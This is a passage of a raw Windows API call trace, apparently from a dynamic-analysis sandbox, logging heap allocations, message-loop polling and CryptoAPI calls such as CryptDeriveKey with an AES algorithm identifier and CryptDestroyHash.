lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43ca790 [0120.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca790, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.671] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.767] TranslateMessage (lpMsg=0x144edac) returned 0 [0120.767] DispatchMessageW (lpMsg=0x144edac) returned 0x0 [0120.767] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0120.767] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0120.768] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0120.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0120.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0120.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0120.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0120.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0120.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0120.768] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0120.768] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0120.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0120.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.769] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0120.769] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0120.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0120.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab08 [0120.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0120.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caad8 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caca0 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0120.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0120.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0120.770] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0120.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0120.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0120.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0120.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0120.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0120.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0120.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0120.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0120.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0120.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0120.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0120.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0120.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0120.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797088 [0120.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0120.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0120.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0120.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0120.773] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0120.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0120.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0120.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0120.773] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0120.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0120.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0120.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0120.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0120.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0120.775] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0120.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0120.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0120.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0120.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0120.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0120.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0120.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0120.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0120.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0120.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 